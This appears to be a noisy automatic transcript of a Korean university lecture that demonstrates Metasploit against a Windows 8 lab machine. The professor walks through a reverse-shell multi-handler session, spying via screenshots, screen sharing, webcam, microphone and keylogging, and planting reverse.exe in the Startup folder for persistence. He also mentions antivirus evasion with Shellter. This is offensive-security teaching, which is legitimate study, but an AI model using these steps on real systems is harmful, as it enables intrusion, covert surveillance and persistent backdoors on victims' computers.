exit on 세션 세션인가 봐요. 교수님 바로 해놨네. 세션지가 아닌가 봅니다. 폴스 ex plyt 마이너스 j 마이너스 j. 자, 그럼 뭐라고 돼 있노? exploit running as background job, 그죠? exploit이 완료됐습니다. 그러나 no session was, 세션이 현재 없습니다. 이거죠? 맞나? 교수님 아까 윈도우즈 AS에서 돌렸는데요 했는데 그 세션이 죽었는가 봐요. 그럼 다시 어떻게 해요? 실행하면 됩니다. 여기 와서 리버스 실행. 그러면 뭐죠? 인터프리트 세션 1 오픈드 해서 뭐다? 여기가 128이니까 129죠? 129 연결이 생겼습니다. 그럼 엔터키 치고 SES 세션즈 -L 누르면 어떻게 해요? 하나가 잡혀있죠? 인터프리트 방식으로. 그럼 교수님 100대가 눌렀다. 그러면 어떻게 해요? ID 1번부터 어떻게 해요? 100번까지가 자동으로 생성돼요. 자, 그럼 교수님 이 시스템 접근하려면 어떻게 하면 됩니까? -i 1번이죠? 인덱스. 그러면 들어옵니다. 그러면 뭐 하면 돼요? 자, 윈도우즈로 들어왔어요. 그러면은 실스 인포가 있나? 있네요. 현재 어디로 들어와 있노? 윈도우즈 8.1 x86 그죠? 그리고 dir 이거 어디죠? 어디로 나오노? C 드라이브 유저의 619T 다운로드라는 폴더입니다. 맞아요? IP config 먹는지 모르겠다. 먹네요. 129라는 기계에 들어와 있고 뭐다 윈도우즈 안에 쓰는 거다. 맥어드레스까지 나오네요. 그지? 그리고 어떻게 해요? SCREN SHOT 상대방이 뭐 하고 있는지 궁금해요. 스크린샷 날리면 VAR HTML 테스트에 뭐가 들어와 있다? 요 이미지가 하나 캡처되어 있다 이 소리예요. 그럼 가볼까요? 오픈 폴드 시스템에 VAR WW HTML 테스트 폴더에 오니까 이미지가 하나 들어왔죠? 이거 누구 거? 현재 윈도우즈 8이죠? 맞나? 현재 이 사람 뭐 하고 있노? 내가 해킹하고 들어와 봤더만은 이 사람 뭐 하고 있노? 그냥 파일 탐색기에 다운로드 돌리고 있네. 이거죠? 자, 그 다음에 봅시다. 조심 막 달려볼게. SCREN SHARE 스크린쉐어. 이건 뭐죠? 이건 뭔데요? 잘 봐. 이게 윈도우즈 8이죠? 자, 이거 내려볼게. 내려가네. 브라우저 올렸네. 203 230 1924 상대방에 있는 기계에 뭐가 되는 거예요? 스크린을 쉐어하고 있는 거예요. 우와, 이거 재밌네. 그죠? 자, 지금 상대방의 기계에는 뭐가 없어요? 뭐가 없지? 이제 이거 끌게요. 컨트롤 C 누르면 빠집니다. 웹캠 리스트인가? 아니네. 나도 이제 헷갈렸네요. 그지? 자, 잘 봐라. 웹캠이 있는지 확인하기 위해서 웹캠 리스트 누르니까 웹캠 언더바 리스트냐 아니면 모르면 뭐 해봐라? 헬프 눌러라 이거죠? 언더바 리스트니? 라는 거지. 그럼 뭐예요? No webcam was found. 이 말은 뭐고? 여기 웹캠이 없잖아. 웹캠이 없으니 당연히 안 나오죠. 그럼 교수님, 이 사람의 컴퓨터에 노트북 다 웹캠 달려 있잖아. 그러면 이 사람 얼굴을 보고 싶어. 그러면은 웹캠 리스트가 모르는데 이제 모르죠? 교수님이 애우고 있는 건 막 때려봤는데 모르죠? 그럼 어떻게 해요? 위에 해놨잖아. 모르면 헬프 눌러봐라고. 그럼 뭐와 디테일하게 커맨드 설명해 주겠다 이거죠? 헬프 때리니까 여기 있네. 웹캠 리스트는 상대방 컴퓨터에 웹캠 리스트가 있는 거고요. 웹캠에 스냅하면 어떻게 해요? 사진을 한 장 살짝 찍어서 보내줍니다.
그리고 웹캠 스트림 하면 어떻게 돼요? 상대방 기계에 웹캠을 켜서 뭐 한다? 스트리밍 해준다. 근데 이거 상당히 위험한 일입니다. 왜? 여러분들 노트북이 웹캠에 작동 중에 불이 들어오잖아요. 그지? 살짝 웹캠 스냅은 괜찮지. 살짝 들어와서 찍고 꺼버릴 거니까. 그럼 교수님, 레코드 마이크는 뭔데요? 이게 뭔데? 상대방 노트북에 마이크 켜라 이거예요. 그래서 어떻게 해요? 소리를 듣는 거지. 사실 마이크가 켜져도 옆에 불이 살짝 들어와요. 근데 사람들은 아무도 신경 안 써. 웹캠은 앞에 보이지만 마이크는 옆 풀백이 붙어 있잖아요. 오, 그런 게 있네. 그리고 상대방 기계에 노래 틀 수 있습니까? 예, 웨이브 파일만 틀 수 있어요. 플레이하고 웨이브 파일을 걸어버리면 노래가 나옵니다. 상대방. 이거 하면 안 되지. 그 다음에 또 뭐가 있노? 키보드를 샌드할 수 있고, 키보드 스캔 스탑. 이 사람이 키보드 뭐 누르는지 다 가져와. 그럼 뭐 할 수 있노? 마우스도 움직일 수 있습니까? 일단 교수님이 방금 한 게 뭐죠? 스크린 세어하고 샷이죠. 맞나? 자, 그 다음에 요 위에는 뭐죠? 셧다운, 컴퓨터 꺼버려라. 그리고 또 뭐죠? 리부트 껐다 켜라. 그리고 또 위에 올라가 있는 또 뭐 있노? 넷스테이트 우리 많이 쓴 거죠? IFIP. 그리고 또 뭐 있노? 업로드. 와, 교수님 너무 많네. 이거 나도 다 몰라. 업로드, 다운로드. 상대방 기계에 업로드, 다운로드 할 수 있고, 뭐죠? 시간을 조절할 수도 있고, 해시를 덤프할 수도 있고, 와, 디지털 프린터로 윈도우 들어오니까 너무 많네요. 한 100여 개 이상의 기능을 공격을 할 수 있습니다. 자, 각설하고, 자, 봐라. 자, DIR. 아무것도 없네. 자, 하나 만듭시다. 만들기, 빔 파일, 텍스트 문서, test.txt. 이거 하나 만듭시다. 그럼 어떻게 해요? dir 누르면 테스트가 만들어지죠. 다운 LOAD test.txt. 그럼 어디로 다운로드 돼요? var www html 테스트에 test.txt로 다운로드 된다 이거죠. 그럼 이거 열어보면 아니네. 이거는 이미지 보는 건데요. 요거겠네. test.txt죠. 맞나? 자, 그럼 여기에 그럼 교수님 bind.exe가 있어요. 요 놈 올릴 수 있을까요? 올릴 수 있을까? 자, 볼까? 업로드 해봅시다. LOAD. 아, 잠깐만, 이거 해야 돼. PWD. 몇 개 안 나오네. 해봅시다. LOAD. 자, 그러면 어떻게 해요? 여기 안에 있죠? var html 테스트에 bind.exe를 어디? 상대방 기계로 보냈습니다. 갔나? 보자. 여기 들어왔잖아요. 근데 방금 보였다 지워졌죠? 왜요? 윈도우즈 8에도 디펜더 허접한 OS지만 이 안에 디펜더가 돌고 있어서 보냈는데 여기 약간 떴잖아. 떴다가 조금씩 사라지죠? 왜? 디펜더가 잡아낸 거에 나중에 가보면은 바인드 방식은 머리오기 때문에 지운 거죠. 자, 클릭하고 봅시다. 이제 다 했어. 오늘은 2시간만 할 겁니다. 자, 그러면 윈도우즈 8을 공격하려면 이제 이거를 설명을 해라고 말로. 뭘 해야 돼요? 공격용 뭘 만들어야 돼요? 악성 코드를 만들어야 된다. 자, 공격용 악성 코드에는 두 가지 방식이 있다. 바인드, 리버스. 맞아요? 그래서 바인드는 뚫고 들어가야 되고 윈도우즈 8에는 디펜더가 잡히고 리버스는 아직 안 잡힌다. 맞아요? 아직 안 잡힙니다. 자, 그 다음에 뭐 하는 거고 이 녀석을 이동할 수 있는 방법을 찾아야겠죠. 와, 근데 교수님 이거 이동을 어떻게 해요? 이거 이메일로 하면은 크롬이나 뭐죠? 포털 메일들은 악성 코드 감지 기능이 있어서 다 잡히는데요. 그럼 그것도 알려줍니다.
안 잡히게 할 수 있습니까? 안 잡히게 할 수도 있다. 자, 어쨌든 그래서 뭐예요? 일단 테스트 해야 되니까 리버스하고 바인드를 칼리 리눅스의 홈페이지에 올리고, 그리고 뭐예요? 윈도우즈 8에서 다운로드 합니다. 근데 요 놈은 잡혔고 요 놈은 안 잡혔다. 그지? 잡히는 것도 보여주려고 윈도우즈 8을 쓰는 거예요. 자, 그러고 뭐다? 저 녀석이 실행되면 인터프리트를 써야 되니까 콘솔을 때리고, 그 다음에 뭐죠? 자, 이건 뭐 하는가? 침투 도구인데 멀티 핸들러. 무슨 소린지 이제 이해되죠? 여러 수백 대가 잡힐 거라고. 그럼 멀티 핸들러가 있어야 된다고. 침투도 하는 방법 중에. 근데 뭘로 한 걸 기다릴 거다? 윈도우즈의 인터프리터의 리버스 방식이다. 그럼 요거는 칼리 포트, set, exit, on session 안 해도 되지만 요걸 설정해 놓으면 세션을 잘 안 죽인다고. 지가. 그리고 언제 할지 모르니까 -J, -Z로 한다. 자, 그래서 어떻게 해요? 윈도우즈 8, 요거 위에 잘 봐. 윈도우즈 8에서 교수님 64로 했네요. 우리 32 깔았잖아. 64 깔아도 상관없어요. 자, 그래서 테스트 폴더에 와서 다운로드 받고 뭐다? 리버스를 뭐다? 따닥 누르면 실행할래? 물어봐서 실행하면 뭐예요? 세션이 하나 잡힙니다. 세션이 하나 잡히면 세션즈 -L 하면 방금 교수님 한 거 다 있죠? 세션의 인덱스를 확인하고 인덱스 1번으로 들어가면 헬프 때리면 할 수 있는 일이 다 있다. 이걸 여러분들이 해보라고. 저 명령들을 하나하나씩 때리면서 뭐 해봐라? 윈도우즈 8에서 어떤 변화가 일어나는지를 확인해 보셔라라는 거예요. 자, 그런데 해킹을 했다. 일단 윈도우즈 8이 지금 해킹이 된 상태잖아요. 침투했는 상태잖아. 그러면 해커가 제일 먼저 해야 될 게 뭐고? 지금 방금 우리가 침투가 가능한 이유는 뭐죠? 윈도우즈 8 사용자가 reverse.exe를 눌렀잖아. 근데 눌렀는데 아무 일도 안 일어나. 그럼 이 사람이 그 다음에 뭐 할까요? 또 돌릴까? 안 돌리죠. 그러면 이 사람이 아이 뭐야? 거지같이 아무것도 안 도네? 그리고 컴퓨터를 껐다가 갔다 오면 뭐예요? 세션이 죽어버린 거예요. 그 다음에는 들어올 수 있나 없나? 못 들어오지. 그러면 이 컴퓨터가 껐다 켜져도 들어와야 될 거 아니야. 그게 시험 문제다. 어떻게 해야 될까? 그러니까 일단은 시스템에 뭘 한 거예요? 침투를 했어. 리눅스를 침투해서 뭘 봐야 돼? 아이디 패스워드부터 가져와야지. 그래야 내가 다음에 또 들어오지. 맞아요? 자, 윈도우즈가 단 한 번이잖아. 실행을 했는데 아무 일도 안 일어나면 그 다음부터는 안 누를 거라고. 그러면은 컴퓨터가 껐다 켜져도 어떻게 해요? 들어와야 될 거 아니야. 어떻게 해야 돼? 여러분들 알야 껐다 켜도 계속 돌잖아. 그지? 카카오톡 껐다 켜도 자동으로 돌잖아요. 왜요? 두 가지 방법이 있습니다. 레지스트리 키에 등록하는 방법. 이게 제일 좋은 거예요. 윈도우즈 레지스트리 키에다가 악성 코드를 올리면 됩니다. 근데 이 방법은 어려워요. 지금은. 왜? 조작을 많이 해야 돼. 레지스트리 키를 열어서 해야 되니까. 원래는 그 방법이에요. 근데 지금은 우리가 교수님 내 컴퓨터에 레지스트리 키도 조작 뭐 하는데, 그지? 할 수 있는 사람도 있는데, 야, 뭐 교수님 아무리 내가 보안까지만 내 컴퓨터 윈도우 10, 11 레지스트리 키 조작 안 해봤는데 한 번도. 맞아요? 그럼 뭐 해야 돼요? 시작 폴더에다 올리면 되잖아. 시작 프로그램에다가 이 파일을 올려놓으면 껐다 켜도 지가 자동으로 돌리겠죠. 맞나? 그러면 교수님 시작 폴더가 어딘지 모르겠는데요. 그래서 여기 뒤에 나와 있습니다. 자, 이거 있다. 요거 과제입니다. 이거 한번 다 눌러봐라. 되는 게 있고 안 되는 게 있어요. 되는 게 있고 안 되는 게 있다. 그래서 메뉴에 있는 명령들부터 하나씩 때려보면서 뭐다 어떤 역할을 하는지를 한번 확인해봐. 다 안 돼요. 여기 있는 헬프를 눌러서 커맨드는 100% 도는 거 아닙니다. 되는 게 있고 안 되는 게 있으니까 한번 찾아보라 이거. 자, 일단 해킹을 했다. 그지? 웹캠을 열고 뭐다 그 시기 마이크 켜고 하는 거는 초보들이 하는 거다. 껐다 켜도 또 들어와야 될 거 아니야. 그럼 어떻게 하나? 자, 일단은 뭘 때려봐요? sysinfo 윈도우즈 8이네. 왜? 윈도우즈 8과 10의 폴더가 조금 달라요. 위치가 윈도우즈 8에 몇 비트? 64비트로 들어왔네.
자, 그래서 어디에요? LS를 누르든 DIR을 누르면 현재 어디? C 드라이브 유저의 CJSEO에 다운로드에 있다는 소리입니다. 그지? 여기 있다 이 소리예요. 자, 그럼 교수님, 또 스크린샷 한번 때려봤네. 스크린샷 때리면 여기 들어오고요. 클릭하면 나오고, 웹캠 리스트 하면 웹캠이 없다 이거죠? 웹캠이 있으면 웹캠 켜면 됩니다. 자, 그 다음에 스크린 쉐어 하면 방금 교수님 한 거 두 개가 나온다 이거예요. 확인해보고, 그리고 다운로드, 지금 현재 어디 있었노? C 드라이브에 뭐다 다운로드 폴더 있었죠? 거기 있는 거 다운로드 한번 할 수도 있고 업로드도 할 수 있다 이거예요. 자, 근데 이게 중요한 게 아니다. 이게 중요한 게 아니다. 그럼 먹고, 이거 뭐가 나오노 갑자기? 아까 한 거 그대로인데요? 왜 페이지가 중복됐어요? 자, 왜 또 들어왔지? 요거다 요거. 요거 보려고 교수님 가져온 거죠. 요 폴더에 뭐가 있노? 스타트업이란 폴더에 뭘 올리면 돼요? reverse.exe를 올려놓으면 뭐 할 수 있다? 뭐 할 수 있다? 이 컴퓨터가 껐다 켜도 뭐 할 수 있다? 여기 있네. 요 reverse.exe를 어디? C의 유저의 요것 먹고 그 컴퓨터 이름이죠? 앱 데이터, 로밍, 마이크로소프트, 윈도우즈, 스타트, 메뉴, 프로그램, 스타트업에다가 업로드 시켜놓으면 이 컴퓨터가 꺼졌다 켜져도 뭐 할 수 있다? 된다. 자, 그러면 가봅시다. 자, 봐라. DIR 현재 어디 있노? 아이고야. DIR 어디? C의 유저의 i619t 이게 이 컴퓨터 이름이죠? 맞나? 거기에 다운로드다. 그럼 교수님 요 폴더로 가려면 어떻게 합니까? CD C 드라이브에 루트에 유저 잠깐만 잘 봐라. 잘 봐. 자, 이것도 시험 문제 낼 거다. 왜? 이거 그대로 쓰면 됩니까? 라는데 그대로 쓰면 안 가요. 윈도우즈는 공백이 있죠. 폴더 이름을 만들 때. 스페이스를 키를 누르면은 입력이 안 됩니다. 그래서 여기에 보면 스타트 메뉴에 공백이 있죠. 요거 해킹 방지하려고 이렇게 띄워놓은 거예요. 그래서 어떻다? 공백을 누르면 스타트 메뉴로 안 가고 스타트로 가요. 스캔F처럼. 자, 그래서 C 드라이브에 땡땡에 두 개를 써야 됩니다. US 누르고 탭을 두 번 뿅 누르면 한 번 누르면 자동 완성돼요. 그 다음에 어디 I 들어오죠? AP 탭 있다 보는가 보다. 데이터 에로 아로죠. MI 그 다음 뭐죠? ST 있는가 봐. 스타트 왜 안 돼? 어이 잠깐만. 백슬래시 캡처 윈도우 잘못 들어왔네. 윈도우즈죠. 그래 왜 안 나와? 윈도우즈 ST 메뉴 PRO 탭 ST 탭 이렇게 하면 요 안에 들어옵니다. DIR 여기 이거밖에 없죠. 여기에 뭐 올려라? 업로드 reverse.exe 그러면 여기 왔습니까? 리버스가 들어왔나요? 됐지? 그러면 이제 뭐가 된 거고 껐다 켜도 또 들어올 수 있는 거죠? 그럼 교수님 껐다 켜도 또 들어올 수 있는지 없는지 어떻게 봐요? 확인해 봐야 되지? 상대방 기계를 껐다가 켜는 명령이 있습니다. 뭐죠? 리부트. 잘 봐라. 여기 리부트 때리면 어떻게 되는지 잘 보세요. 리부트하고 뿅. 그러면 뭐가 돼요? 컴퓨터가 꺼지니까 세션이 죽었겠죠? 맞나? 그러면 야가 꺼졌다가 켜져도 세션이 또 잡혀야 되죠. 현재 백그라운드 모드니까. 기다려 봅시다. 야가 껐다가 켜지면서 시작 프로그램에 우리가 뭘 넣어놨어요? reverse.exe를 넣어놨죠?
619 환영합니다 하고 야 켜졌지? 기다려 봅시다. 잠을 올렸나? 왔네. 이자 왔네. 꺼졌다 켜져도 뭐가 돼요? 세션이 하나 잡혔죠? 여기에 SESS 세션즈 마이너스 N. 그러면 아이고 어디 갔노? 왜 안 돼? SESS 세션즈 마이너스 있죠? 그러니까 윈도우즈 시스템을 내가 악성 코드로 했다. 단 한 번의 기회밖에 없어요. 왜? 두 번씩은 안 누른다. 왜? 순수 악성 코드만 주면 아무 일도 일어나지 않잖아요. 그죠? 그래서 어떻게 해요? 일단은 걸렸다. 그럼 뭐부터 해야 돼? 백도어부터 신겨야 된다. 이걸 백도어라고 그러죠? 그래서 윈도우즈는 어디? 시작 프로그램 안에다가 뭐 한다? 넣어놓으면 됩니다. 근데 저놈은 잘 잡혀요. 왜? 보이잖아. 그지? 그래서 어디다 해야 되냐면 원래는 레지스트리 키에다가 등록을 하는 건데 지금 그거 등록하려면 조작을 많이 해야 된다. 거기까지는 그렇다. 자 봅시다. 자 어떻게 해라? 요 폴더로 이동하려면 뭐 하라? 요 폴더로 이동하려면 CD, C하고 뭐다? 탭 눌러서 와야 돼요. 요거 못 씁니다. 요거. 그래서 어떻게 해요? 업로드 reverse.exe 해놓고 껐다 켜주면 뭐다? 끄면은 리부트 시키면 어떻게 해요? 클로즈 됐다가 다시 들어오면서 어떻게 해요? 잡힙니다. 그럼 이 기계는 컴퓨터를 사용하는 유저가 악성 코드인지 아닌지 확인이 불가능하다면 영원히 얘한테 잡혀 있는 거죠. 근데 아이러니하게도요. 아직도 윈도우즈 8을 사용하는 OS가 전 세계 10%입니다. 어디 써요? 동남아시아, 아프리카에 써요. 그래서 디도스 공격의 진원지가 어디야? 동남아시아잖아. 동남아시아에 윈도우즈 8 쓰는 거는 지금 칼리 리눅스로 만든 악성 코드도 동남아시아에 던지면 작동이 돼요. 우리나라는 안 되겠지. 우리나라 아직 윈도우즈 8 아직도 있더라. 광고판에 쓰는 거. 그 여러분들 뭐야 저 빌딩 위에 있는 광고판 있잖아. 거기 최신 아니고 윈도우즈 8 이런 거 아직 올라가 있어요. 그 옛날에 그 누구야 뭐 조선일보 광고판 누가 하나 뚫고 들어갔잖아. 그 뚫고 들어간 게 아니라 그 뭐야 그 아이디가 노출이 돼서 들어간 거지. 애가 뚫은 건 아니에요. 우리도 이렇게 하면 됩니다. 자 근데 20분 쉽시다. 20분 쉬고 그럼 교수님 이거는 말로만 설명할 거예요. 자, 왜 말로만 설명을 할 거냐면 해보라는 건데 설치하는 시간이 걸려요. 그래서 내가 말로만 설명할 건데 요거는 20분 뒤에 요 앞에 거는 악성 코드 덩어리로 옮긴 거고요. 뒤에 거는 실제 실행 파일에 악성 코드를 감염시킬 수 있습니까? 있습니다. 툴이 있어요? 예. 누구? 셀터라는 걸 쓸 거고 돈을 주면 윈도우즈 10에도 디텍트가 안 된다라고 하는데 돈은 안 줘봤어요. 무료 버전은 교수님이 해보니까 윈도우즈 10에 잡혀요. 근데 이런 방법도 있습니까? 예, 있다라는 거예요. 요거는 10시 반부터